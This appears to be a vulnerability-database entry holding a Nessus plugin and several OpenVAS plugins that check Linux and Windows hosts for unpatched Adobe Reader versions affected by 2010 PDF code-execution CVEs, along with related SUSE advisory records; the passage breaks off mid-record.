ID SUSE_11_3_ACROREAD-101007.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-06-13T00:00:00
Description
Specially crafted PDF documents could crash acroread or lead to
execution of arbitrary code (CVE-2010-2883, CVE-2010-2884,
CVE-2010-2887, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619,
CVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3623,
CVE-2010-3624, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,
CVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,
CVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658).
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update acroread-3275.
#
# The text description of this plugin is (C) SUSE LLC.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(75419);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");
script_cve_id("CVE-2010-2883", "CVE-2010-2884", "CVE-2010-2887", "CVE-2010-2889", "CVE-2010-2890", "CVE-2010-3619", "CVE-2010-3620", "CVE-2010-3621", "CVE-2010-3622", "CVE-2010-3623", "CVE-2010-3624", "CVE-2010-3625", "CVE-2010-3626", "CVE-2010-3627", "CVE-2010-3628", "CVE-2010-3629", "CVE-2010-3630", "CVE-2010-3631", "CVE-2010-3632", "CVE-2010-3656", "CVE-2010-3657", "CVE-2010-3658");
script_name(english:"openSUSE Security Update : acroread (openSUSE-SU-2010:0706-1)");
script_summary(english:"Check for the acroread-3275 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Specially crafted PDF documents could crash acroread or lead to
execution of arbitrary code (CVE-2010-2883, CVE-2010-2884,
CVE-2010-2887, CVE-2010-2889, CVE-2010-2890, CVE-2010-3619,
CVE-2010-3620, CVE-2010-3621, CVE-2010-3622, CVE-2010-3623,
CVE-2010-3624, CVE-2010-3625, CVE-2010-3626, CVE-2010-3627,
CVE-2010-3628, CVE-2010-3629, CVE-2010-3630, CVE-2010-3631,
CVE-2010-3632, CVE-2010-3656, CVE-2010-3657, CVE-2010-3658)."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=638466"
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.opensuse.org/opensuse-updates/2010-10/msg00005.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected acroread package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploithub_sku", value:"EH-11-971");
script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:acroread");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.3");
script_set_attribute(attribute:"patch_publication_date", value:"2010/10/07");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE11\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.3", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686)$") audit(AUDIT_ARCH_NOT, "i586 / i686", ourarch);
flag = 0;
if ( rpm_check(release:"SUSE11.3", reference:"acroread-9.4-0.1.1") ) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "acroread");
}
{"suse": [{"lastseen": "2016-09-04T11:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "Specially crafted PDF documents could crash acroread or lead to execution of arbitrary code. acroread was updated to version 9.4 which addresses the issues. Please see Adobe's site for more information: http://www.adobe.com/support/security/bulletins/apsb10-21.html\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-10-11T17:38:18", "published": "2010-10-11T17:38:18", "id": "SUSE-SA:2010:048", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00001.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:42", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2884"], "description": "Adobe Flash Player was updated to version 10.1.85.3 (resp. 9.0.283.0 on SLE10) to fix a vulnerability that allowed remote attackers to crash the player or potentially even cause execution of arbitrary code (CVE-2010-2884).\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-09-22T16:10:35", "published": "2010-09-22T16:10:35", "id": "SUSE-SA:2010:042", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-09/msg00007.html", "type": "suse", "title": "remote code execution in flash-player", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-01-18T11:04:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "Check for the Version of acroread", "modified": "2018-01-17T00:00:00", "published": "2010-10-19T00:00:00", "id": "OPENVAS:1361412562310850146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850146", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:048\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Specially crafted PDF documents could crash acroread or lead to execution of\n arbitrary code. acroread was updated to version 9.4 which addresses the issues.\n\n Please see Adobe's site for more information:\n http://www.adobe.com/support/security/bulletins/apsb10-21.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850146\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-19 15:54:15 +0200 (Tue, 19 Oct 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-048\");\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:048\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.4~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.4~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:32:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "Check for the Version of acroread", "modified": "2017-12-20T00:00:00", "published": "2010-10-19T00:00:00", "id": "OPENVAS:850146", "href": "http://plugins.openvas.org/nasl.php?oid=850146", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:048\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Specially crafted PDF documents could crash acroread or lead to execution of\n arbitrary code. acroread was updated to version 9.4 which addresses the issues.\n\n Please see Adobe's site for more information:\n http://www.adobe.com/support/security/bulletins/apsb10-21.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850146);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-19 15:54:15 +0200 (Tue, 19 Oct 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-048\");\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:048\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.4~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.4~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-02T15:55:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-2888", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "This host is installed with Adobe Reader/Acrobat and is prone to\n multiple vulnerabilities.", "modified": "2020-05-28T00:00:00", "published": "2010-10-18T00:00:00", "id": "OPENVAS:1361412562310801524", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801524", "type": "openvas", "title": "Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801524\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-10-18 15:37:53 +0200 (Mon, 18 Oct 2010)\");\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2888\", \"CVE-2010-2889\",\n \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\",\n \"CVE-2010-3622\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\",\n \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3632\",\n \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n script_bugtraq_id(43057, 43205, 43739, 43723, 43722, 43724, 43725, 43726, 43729,\n 43730, 43727, 43746, 43734, 43732, 43737, 43735, 43741, 43744,\n 43738);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41435/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2573\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to crash an affected application or\n execute arbitrary code by tricking a user into opening a specially crafted PDF document.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x before 8.2.5 and 9.x before 9.4,\n\n Adobe Acrobat version 8.x before 8.2.5 and 9.x before 9.4 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are caused by memory corruptions, array-indexing, and input validation\n errors when processing malformed data, fonts or images within a PDF document.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader/Acrobat version 9.4 or 8.2.5.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader/Acrobat and is prone to\n multiple vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:acrobat_reader\",\n \"cpe:/a:adobe:acrobat\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"8.2.5\") ||\n version_in_range(version:vers, test_version:\"9.0\", test_version2:\"9.3.4\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.4 or 8.2.5\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-2888", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "This host is installed with Adobe Reader/Acrobat and is prone to\n multiple vulnerabilities.", "modified": "2017-12-21T00:00:00", "published": "2010-10-18T00:00:00", "id": "OPENVAS:801524", "href": "http://plugins.openvas.org/nasl.php?oid=801524", "type": "openvas", "title": "Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_prdts_mult_vuln_oct10_win.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to crash an affected application or\n execute arbitrary code by tricking a user into opening a specially crafted PDF\n document.\n\n Impact Level: System/Application\";\n\ntag_affected = \"Adobe Reader version 8.x before 8.2.5 and 9.x before 9.4,\n\n Adobe Acrobat version 8.x before 8.2.5 and 9.x before 9.4 on windows.\";\n\ntag_insight = \"The flaws are caused by memory corruptions, array-indexing, and input validation\n errors when processing malformed data, fonts or images within a PDF document.\";\n\ntag_solution = \"Upgrade to Adobe Reader/Acrobat version 9.4 or 8.2.5\n For updates refer to http://www.adobe.com\";\n\ntag_summary = \"This host is installed with Adobe Reader/Acrobat and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(801524);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-18 15:37:53 +0200 (Mon, 18 Oct 2010)\");\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2888\", \"CVE-2010-2889\",\n \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\",\n \"CVE-2010-3622\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\",\n \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3632\",\n \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n script_bugtraq_id(43057, 43205, 43739, 43723, 43722, 43724, 43725, 43726, 43729,\n 43730, 43727, 43746, 43734, 43732, 43737, 43735, 43741, 43744,\n 43738);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41435/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2573\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-21.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\nif(readerVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Check for Adobe Reader version < 8.2.5 and 9.x to 9.3.4\n if(version_is_less(version:readerVer, test_version:\"8.2.5\") ||\n version_in_range(version:readerVer, test_version:\"9.0\", test_version2:\"9.3.4\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat\";\nif(acrobatVer = get_app_version(cpe:CPE))\n{\n # Check for Adobe Acrobat version < 8.2.5 and 9.x to 9.3.4\n if(version_is_less(version:acrobatVer, test_version:\"8.2.5\") ||\n version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2:\"9.3.4\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4091", "CVE-2010-2887", "CVE-2010-3654", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201101-08.", "modified": "2019-03-14T00:00:00", "published": "2011-03-09T00:00:00", "id": "OPENVAS:136141256231069044", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069044", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201101-08 (acroread)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201101_08.nasl 14171 2019-03-14 10:22:03Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69044\");\n script_version(\"$Revision: 14171 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 11:22:03 +0100 (Thu, 14 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 